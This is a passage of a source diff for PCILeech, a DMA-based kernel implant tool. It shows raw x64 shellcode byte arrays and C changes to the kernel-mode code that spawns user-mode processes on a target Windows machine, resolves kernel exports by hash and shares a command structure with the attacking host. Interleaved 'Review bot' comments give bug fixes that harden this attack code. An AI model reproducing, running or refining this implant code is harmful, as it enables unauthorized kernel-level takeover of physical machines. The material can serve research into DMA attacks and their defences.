- 0x00, 0x00, 0x48, 0x8b, 0xcb, 0xe8, 0xc6, 0xfe, 0xff, 0xff, 0x85, 0xc0,
- 0x74, 0x79, 0x48, 0x8b, 0x93, 0x88, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x8b,
- 0x80, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x42, 0x10, 0x48, 0x39, 0x41, 0x08,
- 0x75, 0x0a, 0xb9, 0x0a, 0x00, 0x00, 0x00, 0xff, 0x53, 0x50, 0xeb, 0x4a,
- 0x44, 0x8b, 0x41, 0x08, 0x48, 0x8d, 0x51, 0x68, 0x48, 0x83, 0x64, 0x24,
- 0x20, 0x00, 0x4c, 0x8d, 0x4c, 0x24, 0x40, 0x48, 0x8b, 0x4b, 0x60, 0x25,
- 0xff, 0x07, 0x00, 0x00, 0x41, 0x81, 0xe0, 0xff, 0x07, 0x00, 0x00, 0x48,
- 0x03, 0xd0, 0x41, 0x3b, 0xc0, 0x72, 0x06, 0x41, 0xb8, 0x00, 0x08, 0x00,
- 0x00, 0x44, 0x2b, 0xc0, 0xff, 0x53, 0x58, 0x85, 0xc0, 0x74, 0x1c, 0x48,
- 0x8b, 0x8b, 0x88, 0x00, 0x00, 0x00, 0x8b, 0x44, 0x24, 0x40, 0x48, 0x01,
- 0x41, 0x10, 0x83, 0xbb, 0x98, 0x00, 0x00, 0x00, 0x00, 0x0f, 0x85, 0x7b,
- 0xff, 0xff, 0xff, 0x48, 0x8b, 0xcb, 0xe8, 0x39, 0xfc, 0xff, 0xff, 0x48,
- 0x83, 0xc4, 0x30, 0x5b, 0xc3, 0xcc, 0xcc, 0xcc, 0x48, 0x89, 0x5c, 0x24,
- 0x08, 0x48, 0x89, 0x74, 0x24, 0x10, 0x57, 0x48, 0x83, 0xec, 0x50, 0x48,
- 0x8b, 0xfa, 0x48, 0x8b, 0xd9, 0x48, 0x8b, 0xcf, 0xba, 0xfa, 0x97, 0x02,
- 0x4c, 0xe8, 0x7e, 0xfb, 0xff, 0xff, 0xba, 0xa0, 0x00, 0x00, 0x00, 0x8d,
- 0x4a, 0xa0, 0xff, 0xd0, 0x48, 0x8d, 0x8b, 0xe8, 0x0e, 0x00, 0x00, 0x48,
- 0x8b, 0xf0, 0x48, 0x89, 0x08, 0x48, 0x8d, 0x50, 0x08, 0x48, 0x8b, 0xcf,
- 0xe8, 0x1f, 0xfd, 0xff, 0xff, 0x48, 0x8b, 0x0e, 0x48, 0x83, 0xb9, 0x08,
- 0x01, 0x00, 0x00, 0x00, 0x0f, 0x84, 0x84, 0x00, 0x00, 0x00, 0x48, 0x83,
- 0x64, 0x24, 0x38, 0x00, 0x4c, 0x8d, 0x44, 0x24, 0x30, 0xc7, 0x44, 0x24,
- 0x30, 0x18, 0x00, 0x00, 0x00, 0x48, 0xba, 0x21, 0x95, 0xef, 0xdf, 0x32,
- 0x12, 0x65, 0x12, 0xbf, 0x01, 0x00, 0x00, 0x00, 0xbb, 0x00, 0x08, 0x00,
- 0x00, 0x89, 0x7c, 0x24, 0x40, 0x44, 0x8b, 0xcb, 0x48, 0x8b, 0x06, 0x48,
- 0x8b, 0x88, 0x08, 0x01, 0x00, 0x00, 0x48, 0x89, 0x8e, 0x80, 0x00, 0x00,
- 0x00, 0x48, 0x8b, 0x80, 0x08, 0x01, 0x00, 0x00, 0x48, 0x05, 0x00, 0x10,
- 0x00, 0x00, 0x48, 0x89, 0x86, 0x88, 0x00, 0x00, 0x00, 0x48, 0x89, 0x11,
- 0x48, 0x8d, 0x4e, 0x78, 0x48, 0x8b, 0x86, 0x88, 0x00, 0x00, 0x00, 0x48,
- 0x89, 0x10, 0x48, 0x8d, 0x56, 0x60, 0xff, 0x56, 0x10, 0x48, 0x8d, 0x56,
- 0x70, 0x44, 0x8b, 0xcb, 0x48, 0x8d, 0x4e, 0x68, 0x4c, 0x8d, 0x44, 0x24,
- 0x30, 0xff, 0x56, 0x10, 0x89, 0xbe, 0x98, 0x00, 0x00, 0x00, 0x48, 0x8b,
- 0xce, 0xe8, 0xb2, 0xfb, 0xff, 0xff, 0x85, 0xc0, 0x75, 0x10, 0x48, 0x8b,
- 0xce, 0xe8, 0x42, 0xfb, 0xff, 0xff, 0x48, 0x8b, 0xce, 0xff, 0x56, 0x40,
- 0xeb, 0x45, 0x48, 0x8b, 0x06, 0x48, 0x83, 0xb8, 0x08, 0x01, 0x00, 0x00,
- 0x00, 0x74, 0x38, 0x48, 0x83, 0x64, 0x24, 0x28, 0x00, 0x4c, 0x8d, 0x05,
- 0x44, 0xfe, 0xff, 0xff, 0x83, 0x64, 0x24, 0x20, 0x00, 0x4c, 0x8b, 0xce,
- 0x33, 0xd2, 0x33, 0xc9, 0xff, 0x56, 0x20, 0x48, 0x83, 0x64, 0x24, 0x28,
- 0x00, 0x4c, 0x8d, 0x05, 0x40, 0xfd, 0xff, 0xff, 0x83, 0x64, 0x24, 0x20,
- 0x00, 0x4c, 0x8b, 0xce, 0x33, 0xd2, 0x33, 0xc9, 0xff, 0x56, 0x20, 0x48,
- 0x8b, 0x5c, 0x24, 0x60, 0x48, 0x8b, 0x74, 0x24, 0x68, 0x48, 0x83, 0xc4,
- 0x50, 0x5f, 0xc3
+ 0x41, 0x78, 0x48, 0x8b, 0xd9, 0x33, 0xc9, 0x48, 0x89, 0x08, 0x39, 0x8b,
+ 0x88, 0x00, 0x00, 0x00, 0x74, 0x22, 0x89, 0x8b, 0x88, 0x00, 0x00, 0x00,
+ 0x48, 0x8b, 0x4b, 0x58, 0xff, 0x53, 0x08, 0x48, 0x8b, 0x4b, 0x50, 0xff,
+ 0x53, 0x08, 0x48, 0x8b, 0x4b, 0x60, 0xff, 0x53, 0x08, 0x48, 0x8b, 0x4b,
+ 0x68, 0xff, 0x53, 0x08, 0x48, 0x8b, 0x43, 0x70, 0x48, 0xb9, 0xac, 0xda,
+ 0x37, 0x13, 0x00, 0x22, 0xda, 0xfe, 0x48, 0x89, 0x08, 0x48, 0x8b, 0x43,
+ 0x78, 0x48, 0x89, 0x08, 0x48, 0x83, 0xc4, 0x20, 0x5b, 0xc3, 0xcc, 0xcc,
+ 0x40, 0x53, 0x48, 0x83, 0xec, 0x70, 0xba, 0x68, 0x00, 0x00, 0x00, 0x48,
+ 0x8b, 0xd9, 0x8d, 0x4a, 0xd8, 0xff, 0x53, 0x30, 0xc7, 0x00, 0x68, 0x00,
+ 0x00, 0x00, 0xc7, 0x40, 0x3c, 0x00, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x13,
+ 0x48, 0x83, 0xba, 0x08, 0x01, 0x00, 0x00, 0x00, 0x74, 0x18, 0x48, 0x8b,
+ 0x4b, 0x60, 0x48, 0x89, 0x48, 0x58, 0x48, 0x8b, 0x4b, 0x68, 0x48, 0x89,
+ 0x48, 0x50, 0x48, 0x8b, 0x4b, 0x60, 0x48, 0x89, 0x48, 0x60, 0x48, 0x8b,
+ 0x13, 0x48, 0x8d, 0x4c, 0x24, 0x50, 0x48, 0x89, 0x4c, 0x24, 0x48, 0x45,
+ 0x33, 0xc9, 0x48, 0x89, 0x44, 0x24, 0x40, 0x45, 0x33, 0xc0, 0x48, 0x83,
+ 0x64, 0x24, 0x38, 0x00, 0x33, 0xc9, 0x48, 0x83, 0x64, 0x24, 0x30, 0x00,
+ 0x8b, 0x82, 0x10, 0x01, 0x00, 0x00, 0x89, 0x44, 0x24, 0x28, 0xc7, 0x44,
+ 0x24, 0x20, 0x01, 0x00, 0x00, 0x00, 0xff, 0x53, 0x18, 0x85, 0xc0, 0x74,
+ 0x26, 0x48, 0x8b, 0x4c, 0x24, 0x50, 0x48, 0x89, 0x8b, 0x80, 0x00, 0x00,
+ 0x00, 0x48, 0x8b, 0x0b, 0x48, 0x83, 0xb9, 0x08, 0x01, 0x00, 0x00, 0x00,
+ 0x74, 0x08, 0x48, 0x8b, 0x4c, 0x24, 0x58, 0xff, 0x53, 0x08, 0xb8, 0x01,
+ 0x00, 0x00, 0x00, 0x48, 0x83, 0xc4, 0x70, 0x5b, 0xc3, 0xcc, 0xcc, 0xcc,
+ 0x48, 0x8b, 0xc4, 0x48, 0x89, 0x58, 0x08, 0x48, 0x89, 0x68, 0x10, 0x48,
+ 0x89, 0x70, 0x18, 0x57, 0x48, 0x83, 0xec, 0x50, 0x48, 0x8b, 0xe9, 0xc7,
+ 0x40, 0xc8, 0xfb, 0x97, 0xfd, 0x0f, 0xc7, 0x40, 0xcc, 0x80, 0x8f, 0x0c,
+ 0x17, 0x48, 0x8d, 0x7a, 0x48, 0xc7, 0x40, 0xd0, 0x72, 0xfe, 0xb3, 0x16,
+ 0x48, 0x8d, 0x70, 0xec, 0xc7, 0x40, 0xd4, 0x6b, 0xd0, 0x2b, 0xca, 0xbb,
+ 0x09, 0x00, 0x00, 0x00, 0xc7, 0x40, 0xd8, 0x74, 0xab, 0x30, 0xac, 0xc7,
+ 0x40, 0xdc, 0xfa, 0x97, 0x02, 0x4c, 0xc7, 0x40, 0xe0, 0x16, 0x65, 0xfa,
+ 0x10, 0xc7, 0x40, 0xe4, 0xb0, 0x49, 0x2d, 0xdb, 0xc7, 0x40, 0xe8, 0x1f,
+ 0x79, 0x0a, 0xe8, 0x48, 0x8d, 0x76, 0xfc, 0x48, 0x8b, 0xcd, 0x8b, 0x16,
+ 0x48, 0x8d, 0x7f, 0xf8, 0xe8, 0xeb, 0xfd, 0xff, 0xff, 0x48, 0x89, 0x07,
+ 0x83, 0xc3, 0xff, 0x75, 0xe6, 0x48, 0x8b, 0x5c, 0x24, 0x60, 0x48, 0x8b,
+ 0x6c, 0x24, 0x68, 0x48, 0x8b, 0x74, 0x24, 0x70, 0x48, 0x83, 0xc4, 0x50,
+ 0x5f, 0xc3, 0xcc, 0xcc, 0x48, 0x83, 0xec, 0x28, 0x48, 0x8b, 0xc1, 0x48,
+ 0x8d, 0x54, 0x24, 0x30, 0x48, 0x8b, 0x89, 0x80, 0x00, 0x00, 0x00, 0xff,
+ 0x50, 0x28, 0x33, 0xc9, 0x85, 0xc0, 0x74, 0x0f, 0x81, 0x7c, 0x24, 0x30,
+ 0x03, 0x01, 0x00, 0x00, 0x75, 0x05, 0xb9, 0x01, 0x00, 0x00, 0x00, 0x8b,
+ 0xc1, 0x48, 0x83, 0xc4, 0x28, 0xc3, 0xcc, 0xcc, 0x48, 0x89, 0x5c, 0x24,
+ 0x10, 0x56, 0x48, 0x83, 0xec, 0x30, 0x83, 0xb9, 0x88, 0x00, 0x00, 0x00,
+ 0x00, 0x48, 0x8b, 0xd9, 0x0f, 0x84, 0xab, 0x00, 0x00, 0x00, 0xbe, 0x00,
+ 0x08, 0x00, 0x00, 0x48, 0x8b, 0xcb, 0xe8, 0xa5, 0xff, 0xff, 0xff, 0x85,
+ 0xc0, 0x0f, 0x84, 0x96, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x43, 0x70, 0x4c,
+ 0x8b, 0x4b, 0x78, 0x48, 0x83, 0x64, 0x24, 0x20, 0x00, 0x8b, 0x48, 0x10,
+ 0x41, 0x8b, 0x51, 0x08, 0x81, 0xe1, 0xff, 0x07, 0x00, 0x00, 0x81, 0xe2,
+ 0xff, 0x07, 0x00, 0x00, 0x3b, 0xca, 0x8b, 0xc2, 0x48, 0x8b, 0x4b, 0x58,
+ 0x77, 0x08, 0x44, 0x8b, 0xc6, 0x44, 0x2b, 0xc2, 0xeb, 0x03, 0x45, 0x33,
+ 0xc0, 0x49, 0x8d, 0x51, 0x68, 0x48, 0x03, 0xd0, 0x4c, 0x8d, 0x4c, 0x24,
+ 0x40, 0xff, 0x53, 0x38, 0x85, 0xc0, 0x74, 0x4d, 0x48, 0x8b, 0x4b, 0x78,
+ 0x8b, 0x44, 0x24, 0x40, 0x48, 0x01, 0x41, 0x08, 0xeb, 0x1d, 0x83, 0xbb,
+ 0x88, 0x00, 0x00, 0x00, 0x00, 0x74, 0x36, 0x48, 0x8b, 0xcb, 0xe8, 0x35,
+ 0xff, 0xff, 0xff, 0x85, 0xc0, 0x74, 0x1d, 0xb9, 0x0a, 0x00, 0x00, 0x00,
+ 0xff, 0x53, 0x40, 0x48, 0x8b, 0x4b, 0x78, 0x48, 0x8b, 0x43, 0x70, 0x48,
+ 0x8b, 0x49, 0x08, 0x48, 0x2b, 0x48, 0x10, 0x48, 0x3b, 0xce, 0x73, 0xce,
+ 0x83, 0xbb, 0x88, 0x00, 0x00, 0x00, 0x00, 0x0f, 0x85, 0x5a, 0xff, 0xff,
+ 0xff, 0x48, 0x8b, 0xcb, 0xe8, 0x5b, 0xfd, 0xff, 0xff, 0x48, 0x8b, 0x5c,
+ 0x24, 0x48, 0x48, 0x83, 0xc4, 0x30, 0x5e, 0xc3, 0x40, 0x53, 0x48, 0x83,
+ 0xec, 0x30, 0x83, 0xb9, 0x88, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0xd9,
+ 0x74, 0x78, 0x48, 0x8b, 0xcb, 0xe8, 0xda, 0xfe, 0xff, 0xff, 0x85, 0xc0,
+ 0x74, 0x6c, 0x48, 0x8b, 0x53, 0x78, 0x48, 0x8b, 0x4b, 0x70, 0x48, 0x8b,
+ 0x42, 0x10, 0x48, 0x39, 0x41, 0x08, 0x75, 0x0a, 0xb9, 0x0a, 0x00, 0x00,
+ 0x00, 0xff, 0x53, 0x40, 0xeb, 0x47, 0x44, 0x8b, 0x41, 0x08, 0x48, 0x8d,
+ 0x51, 0x68, 0x48, 0x83, 0x64, 0x24, 0x20, 0x00, 0x4c, 0x8d, 0x4c, 0x24,
+ 0x40, 0x48, 0x8b, 0x4b, 0x50, 0x25, 0xff, 0x07, 0x00, 0x00, 0x41, 0x81,
+ 0xe0, 0xff, 0x07, 0x00, 0x00, 0x48, 0x03, 0xd0, 0x41, 0x3b, 0xc0, 0x72,
+ 0x06, 0x41, 0xb8, 0x00, 0x08, 0x00, 0x00, 0x44, 0x2b, 0xc0, 0xff, 0x53,
+ 0x48, 0x85, 0xc0, 0x74, 0x15, 0x48, 0x8b, 0x4b, 0x78, 0x8b, 0x44, 0x24,
+ 0x40, 0x48, 0x01, 0x41, 0x10, 0x83, 0xbb, 0x88, 0x00, 0x00, 0x00, 0x00,
+ 0x75, 0x88, 0x48, 0x8b, 0xcb, 0xe8, 0xbe, 0xfc, 0xff, 0xff, 0x48, 0x83,
+ 0xc4, 0x30, 0x5b, 0xc3, 0x48, 0x89, 0x5c, 0x24, 0x08, 0x48, 0x89, 0x74,
+ 0x24, 0x10, 0x57, 0x48, 0x83, 0xec, 0x50, 0x48, 0x8b, 0xfa, 0x48, 0x8b,
+ 0xd9, 0x48, 0x8b, 0xcf, 0xba, 0xfa, 0x97, 0x02, 0x4c, 0xe8, 0x06, 0xfc,
+ 0xff, 0xff, 0xba, 0x90, 0x00, 0x00, 0x00, 0x8d, 0x4a, 0xb0, 0xff, 0xd0,
+ 0x48, 0x8d, 0x8b, 0xe8, 0x0e, 0x00, 0x00, 0x48, 0x8b, 0xf0, 0x48, 0x89,
+ 0x08, 0x48, 0x8d, 0x50, 0x08, 0x48, 0x8b, 0xcf, 0xe8, 0x83, 0xfd, 0xff,
+ 0xff, 0x48, 0x8b, 0x0e, 0x48, 0x83, 0xb9, 0x08, 0x01, 0x00, 0x00, 0x00,
+ 0x74, 0x7b, 0x48, 0x83, 0x64, 0x24, 0x38, 0x00, 0x4c, 0x8d, 0x44, 0x24,
+ 0x30, 0xc7, 0x44, 0x24, 0x30, 0x18, 0x00, 0x00, 0x00, 0x48, 0xba, 0x21,
+ 0x95, 0xef, 0xdf, 0x32, 0x12, 0x65, 0x12, 0xbf, 0x01, 0x00, 0x00, 0x00,
+ 0xbb, 0x00, 0x08, 0x00, 0x00, 0x89, 0x7c, 0x24, 0x40, 0x44, 0x8b, 0xcb,
+ 0x48, 0x8b, 0x06, 0x48, 0x8b, 0x88, 0x08, 0x01, 0x00, 0x00, 0x48, 0x89,
+ 0x4e, 0x70, 0x48, 0x8b, 0x80, 0x08, 0x01, 0x00, 0x00, 0x48, 0x05, 0x00,
+ 0x10, 0x00, 0x00, 0x48, 0x89, 0x46, 0x78, 0x48, 0x89, 0x11, 0x48, 0x8d,
+ 0x4e, 0x68, 0x48, 0x8b, 0x46, 0x78, 0x48, 0x89, 0x10, 0x48, 0x8d, 0x56,
+ 0x50, 0xff, 0x56, 0x10, 0x48, 0x8d, 0x56, 0x60, 0x44, 0x8b, 0xcb, 0x48,
+ 0x8d, 0x4e, 0x58, 0x4c, 0x8d, 0x44, 0x24, 0x30, 0xff, 0x56, 0x10, 0x89,
+ 0xbe, 0x88, 0x00, 0x00, 0x00, 0x48, 0x8b, 0xce, 0xe8, 0x3f, 0xfc, 0xff,
+ 0xff, 0x85, 0xc0, 0x75, 0x0a, 0x48, 0x8b, 0xce, 0xe8, 0xd7, 0xfb, 0xff,
+ 0xff, 0xeb, 0x45, 0x48, 0x8b, 0x06, 0x48, 0x83, 0xb8, 0x08, 0x01, 0x00,
+ 0x00, 0x00, 0x74, 0x38, 0x48, 0x83, 0x64, 0x24, 0x28, 0x00, 0x4c, 0x8d,
+ 0x05, 0x6b, 0xfe, 0xff, 0xff, 0x83, 0x64, 0x24, 0x20, 0x00, 0x4c, 0x8b,
+ 0xce, 0x33, 0xd2, 0x33, 0xc9, 0xff, 0x56, 0x20, 0x48, 0x83, 0x64, 0x24,
+ 0x28, 0x00, 0x4c, 0x8d, 0x05, 0x77, 0xfd, 0xff, 0xff, 0x83, 0x64, 0x24,
+ 0x20, 0x00, 0x4c, 0x8b, 0xce, 0x33, 0xd2, 0x33, 0xc9, 0xff, 0x56, 0x20,
+ 0x48, 0x8b, 0x5c, 0x24, 0x60, 0x48, 0x8b, 0x74, 0x24, 0x68, 0x48, 0x83,
+ 0xc4, 0x50, 0x5f, 0xc3
};
- unsigned int wx64_exec_user_bin_len = 1539;
+ *ppb = wx64_exec_user_bin; // user data
+ *pcb = sizeof(wx64_exec_user_bin);
+}
+#endif /* ! _EXEC_USER_EXTERNAL */
+
+#ifdef _EXEC_USER_EXTERNAL
+VOID GetUserExecShellcode(_In_ PKMDDATA pk, _Out_ PBYTE *ppb, _Out_ PDWORD pcb)
+{
+ *ppb = pk->ReservedKMD[2]; // user data
+ *pcb = 0x1000 - (pk->ReservedKMD[2] & 0xfff);
+}
+#endif /* _EXEC_USER_EXTERNAL */
+
+//----------------------------------------------------------------------------------------------------------
+// USER MODE CODE SETUP BELOW:
+//----------------------------------------------------------------------------------------------------------
+
+NTSTATUS IntializeUserModeCode(_In_ PKMDDATA pk, _In_ PKERNEL_FUNCTIONS fnk, _In_ PKERNEL_FUNCTIONS2 fnk2, PBYTE pb, QWORD qwAddrConsoleBuffer)
+{
+ PBYTE pbCodeUser;
+ DWORD cbCodeUser;
+ GetUserExecShellcode(pk, &pbCodeUser, &cbCodeUser);
+
+ pk->ReservedKMD[4] = 0x7777666677776666;
+ pk->ReservedKMD[5] = pbCodeUser;
+ pk->ReservedKMD[6] = cbCodeUser;
+ pk->ReservedKMD[6] = *(PQWORD)pbCodeUser;
PUSERSHELL_CONFIG pCfg = (PUSERSHELL_CONFIG)(pb + 0x1000 - sizeof(USERSHELL_CONFIG));
SIZE_T cchProcToStart = fnk2->strnlen(pk->dataInStr, MAX_PATH);
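Review bot: The two back-to-back stores to `pk->ReservedKMD[6]` leave the first one (`cbCodeUser`) dead — the second overwrites it with the first eight bytes of the shellcode, so whatever reads slot 6 on the host side gets code bytes, not a length. Together with the `0x7777666677776666` marker in slot 4 and the uncast pointer store into slot 5, these read as debugging leftovers; either drop them or give each value its own slot with a comment naming the consumer, keeping only `pk->ReservedKMD[6] = cbCodeUser;` if the length is what the host expects. In the `_EXEC_USER_EXTERNAL` variant `*pcb` is `0x1000 - (ReservedKMD[2] & 0xfff)`, i.e. the bytes left in the page rather than the real code size, which deserves a comment there such as `// length is the remainder of the page, not the code size; the host must place the blob so its tail fits`. IntializeUserModeCode's body continues past this hunk.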
@@ -395,7 +407,7 @@ NTSTATUS IntializeUserModeCode(_In_ PKMDDATA pk, _In_ PKERNEL_FUNCTIONS fnk, _In
return E_INVALIDARG;
}
fnk->RtlZeroMemory(pb, 0x1000);
- fnk->RtlCopyMemory(pb, wx64_exec_user_bin, wx64_exec_user_bin_len);
+ fnk->RtlCopyMemory(pb, pbCodeUser, cbCodeUser);
fnk->RtlCopyMemory(pCfg->szProcToStart, pk->dataInStr, MAX_PATH);
pCfg->fCreateProcess = (DWORD)pk->dataIn[1];
pCfg->qwAddrConsoleBuffer = qwAddrConsoleBuffer;
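Review bot: `fnk->RtlCopyMemory(pb, pbCodeUser, cbCodeUser)` has no upper bound on `cbCodeUser`, yet `pCfg` occupies the last `sizeof(USERSHELL_CONFIG)` bytes of the same 4 KiB page and is written immediately afterwards. For the embedded blob the size is a fixed ~1.5 KiB and fits, but in the `_EXEC_USER_EXTERNAL` build the length is derived from the page offset of `ReservedKMD[2]` and can reach 0x1000, in which case the config writes silently clobber the shellcode tail (or the copy reads past a shorter source). Add a bound next to the existing argument validation: `if(cbCodeUser > 0x1000 - sizeof(USERSHELL_CONFIG)) { return E_INVALIDARG; }`. The enclosing function starts outside this hunk.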
@@ -444,6 +456,7 @@ QWORD SetupConsoleBufferUserMode(_In_ PKMDDATA pk, _In_ PKERNEL_FUNCTIONS fnk, _
//----------------------------------------------------------------------------------------------------------
// Windows 7 APC ROUTINES BELOW (WORKAROUND FOR MISSING ntoskrnl!RtlCreateUserThread).
//----------------------------------------------------------------------------------------------------------
+#ifdef _WIN7_COMPAT
/*
* The KernelApcRoutine is called after the user mode APC is completed.
@@ -614,6 +627,7 @@ VOID ActionDefault_QueueApcState(_In_ PKMDDATA pk, _In_ PKERNEL_FUNCTIONS fnk, _
fail:
if(pKApc) { fnk->ExFreePool(pKApc); }
}
+#endif /* _WIN7_COMPAT */
//----------------------------------------------------------------------------------------------------------
// MAIN CODE BELOW:
@@ -692,12 +706,15 @@ VOID ActionDefault(_In_ PKMDDATA pk, _In_ PKERNEL_FUNCTIONS fnk, _In_ PKERNEL_FU
goto fail;
}
CommonSleep(fnk, 250);
- } else {
+ }
+#ifdef _WIN7_COMPAT
+ else {
// Windows 7 fallback to more complicated KeInsertQueueApc method.
ActionDefault_QueueApcState(pk, fnk, fnk2, Process, ApcState, pvAddressUserMode);
}
+#endif /* _WIN7_COMPAT */
fail:
- if(ZwProcessHandle) { fnk2->ZwClose(ZwProcessHandle); }
+ if(ZwProcessHandle) { fnk->ZwClose(ZwProcessHandle); }
if(Process) { fnk2->ObDereferenceObject(Process); }
}
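Review bot: With `_WIN7_COMPAT` undefined the former `else` branch vanishes entirely, so when the `if` condition above (outside this hunk) is not met ActionDefault reaches `fail:` having started nothing and, as far as the visible lines show, without recording why in `pk`. A matching `#else` that leaves a trace would make the build-time choice visible at run time, e.g. `#else /* !_WIN7_COMPAT */` followed by `// Win7 fallback compiled out: no user thread is created on kernels lacking RtlCreateUserThread` or, better, a status write if the KMD protocol has one for this case. The switch from `fnk2->ZwClose` to `fnk->ZwClose` is presumably a fix for an entry missing from KERNEL_FUNCTIONS2; a word on that in the commit message would help the next reader.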
diff --git a/pcileech_shellcode/wx64_stage3_c.c b/pcileech_shellcode/wx64_stage3_c.c
index b7e9310..740481a 100644
--- a/pcileech_shellcode/wx64_stage3_c.c
+++ b/pcileech_shellcode/wx64_stage3_c.c
@@ -1,6 +1,6 @@
// wx64_stage3_c.c : stage3 main shellcode.
//
-// (c) Ulf Frisk, 2016
+// (c) Ulf Frisk, 2016, 2017
// Author: Ulf Frisk, pcileech@frizk.net
//
#include
@@ -140,30 +140,30 @@ typedef struct tdNTOS {
* KMD DATA struct. This struct must be contained in a 4096 byte section (page).
* This page/struct is used to communicate between the inserted kernel code and
* the pcileech program.
-* VNR: 002
+* VNR: 003
*/
typedef struct tdKMDDATA {
QWORD MAGIC; // [0x000] magic number 0x0ff11337711333377.
- QWORD AddrKernelBase; // [0x008] pre-filled by stage2, virtual address of KERNEL HEADER (WINDOWS/OSX).
+ QWORD AddrKernelBase; // [0x008] pre-filled by stage2, virtual address of kernel header (WINDOWS/MACOS).
QWORD AddrKallsymsLookupName; // [0x010] pre-filled by stage2, virtual address of kallsyms_lookup_name (LINUX).
QWORD DMASizeBuffer; // [0x018] size of DMA buffer.
QWORD DMAAddrPhysical; // [0x020] physical address of DMA buffer.
QWORD DMAAddrVirtual; // [0x028] virtual address of DMA buffer.
QWORD _status; // [0x030] status of operation
QWORD _result; // [0x038] result of operation TRUE|FALSE
- QWORD _address; // [0x040] virtual address to operate on.
+ QWORD _address; // [0x040] address to operate on.
QWORD _size; // [0x048] size of operation / data in DMA buffer.
QWORD OperatingSystem; // [0x050] operating system type
- QWORD ReservedKMD; // [0x058] reserved for specific kmd data (dependant on KMD version).
- QWORD ReservedFutureUse1[20]; // [0x060] reserved for future use.
+ QWORD ReservedKMD[8]; // [0x058] reserved for specific kmd data (dependant on KMD version).
+ QWORD ReservedFutureUse1[13]; // [0x098] reserved for future use.
QWORD dataInExtraLength; // [0x100] length of extra in-data.
QWORD dataInExtraOffset; // [0x108] offset from DMAAddrPhysical/DMAAddrVirtual.
QWORD dataInExtraLengthMax; // [0x110] maximum length of extra in-data.
QWORD dataInConsoleBuffer; // [0x118] physical address of 1-page console buffer.
QWORD dataIn[28]; // [0x120]
- QWORD dataOutExtraLength; // [0x200] length of extra in-data.
+ QWORD dataOutExtraLength; // [0x200] length of extra out-data.
QWORD dataOutExtraOffset; // [0x208] offset from DMAAddrPhysical/DMAAddrVirtual.
- QWORD dataOutExtraLengthMax; // [0x210] maximum length of extra in-data.
+ QWORD dataOutExtraLengthMax; // [0x210] maximum length of extra out-data.
QWORD dataOutConsoleBuffer; // [0x218] physical address of 1-page console buffer.
QWORD dataOut[28]; // [0x220]
NTOS fn; // [0x300] used by shellcode to store function pointers.
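Review bot: The `ReservedKMD`/`ReservedFutureUse1` resize keeps `dataInExtraLength` at 0x100 (0x58 + 8*8 + 13*8), but that only holds while the two counts move in lockstep, and the host program shares this layout purely by offset. A compile-time check right after the typedef, e.g. `C_ASSERT(FIELD_OFFSET(KMDDATA, dataInExtraLength) == 0x100);` (or the equivalent static assert for this toolchain) plus one for `fn` at 0x300, would catch the next drift, since the bracketed offset comments are not verified by anything. Because the VNR bump to 003 changes what `ReservedKMD` means, the host-side loader should presumably reject shellcode built for another version; confirm the version number is actually compared somewhere.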
@@ -227,17 +227,22 @@ VOID stage3_c_EntryPoint(PKMDDATA pk)
{
pk->MAGIC = 0x0ff11337711333377;
pk->OperatingSystem = KMDDATA_OPERATING_SYSTEM_WINDOWS;
- pk->fn.ExFreePool = PEGetProcAddressH(pk->AddrKernelBase, H_ExFreePool);
- pk->fn.MmFreeContiguousMemory = PEGetProcAddressH(pk->AddrKernelBase, H_MmFreeContiguousMemory);
- pk->fn.MmAllocateContiguousMemory = PEGetProcAddressH(pk->AddrKernelBase, H_MmAllocateContiguousMemory);
- pk->fn.MmGetPhysicalAddress = PEGetProcAddressH(pk->AddrKernelBase, H_MmGetPhysicalAddress);
- pk->fn.MmGetPhysicalMemoryRanges = PEGetProcAddressH(pk->AddrKernelBase, H_MmGetPhysicalMemoryRanges);
- pk->fn.MmMapIoSpace = PEGetProcAddressH(pk->AddrKernelBase, H_MmMapIoSpace);
- pk->fn.MmUnmapIoSpace = PEGetProcAddressH(pk->AddrKernelBase, H_MmUnmapIoSpace);
- pk->fn.PsCreateSystemThread = PEGetProcAddressH(pk->AddrKernelBase, H_PsCreateSystemThread);
- pk->fn.RtlCopyMemory = PEGetProcAddressH(pk->AddrKernelBase, H_RtlCopyMemory);
- pk->fn.ZwProtectVirtualMemory = PEGetProcAddressH(pk->AddrKernelBase, H_ZwProtectVirtualMemory);
- pk->fn.KeDelayExecutionThread = PEGetProcAddressH(pk->AddrKernelBase, H_KeDelayExecutionThread);
+ DWORD i = 0, NAMES[32];
+ NAMES[i++] = H_ExFreePool;
+ NAMES[i++] = H_MmFreeContiguousMemory;
+ NAMES[i++] = H_MmAllocateContiguousMemory;
+ NAMES[i++] = H_MmGetPhysicalAddress;
+ NAMES[i++] = H_MmGetPhysicalMemoryRanges;
+ NAMES[i++] = H_MmMapIoSpace;
+ NAMES[i++] = H_MmUnmapIoSpace;
+ NAMES[i++] = H_PsCreateSystemThread;
+ NAMES[i++] = H_RtlCopyMemory;
+ NAMES[i++] = H_ZwProtectVirtualMemory;
+ NAMES[i++] = H_KeDelayExecutionThread;
+ while(i) {
+ i--;
+ *((PQWORD)&pk->fn + i) = PEGetProcAddressH(pk->AddrKernelBase, NAMES[i]);
+ }
stage3_c_MainCommandLoop(pk);
}
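Review bot: The fill loop `*((PQWORD)&pk->fn + i) = PEGetProcAddressH(...)` assumes the `NAMES` order is exactly the member order of `NTOS` and that every member is pointer-sized; a reordered or inserted `tdNTOS` field would silently place the wrong kernel routine in a slot and only surface as a crash at call time. Pin that coupling with a comment on the list, `// order MUST match the member order of tdNTOS (filled positionally below)`, and a bound such as `C_ASSERT(sizeof(NTOS) >= 11 * sizeof(QWORD));` or an equivalent static assert on the final value of `i`. Unresolved exports are still stored as NULL unchecked, as before; if `PEGetProcAddressH` can fail on a supported build, a NULL check before `stage3_c_MainCommandLoop(pk)` is cheap insurance against a kernel-mode jump to zero.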
diff --git a/readme.md b/readme.md
index ad2cb31..d185bad 100644
--- a/readme.md
+++ b/readme.md
@@ -220,3 +220,7 @@ v2.4
v2.5
* SP605/FT601: re-designed and improved. NB! FPGA device have to be re-flashed with new bitstream!
* SP605/TCP: bug fixes.
+
+Latest
+* Display command added.
+* Various bug fixes.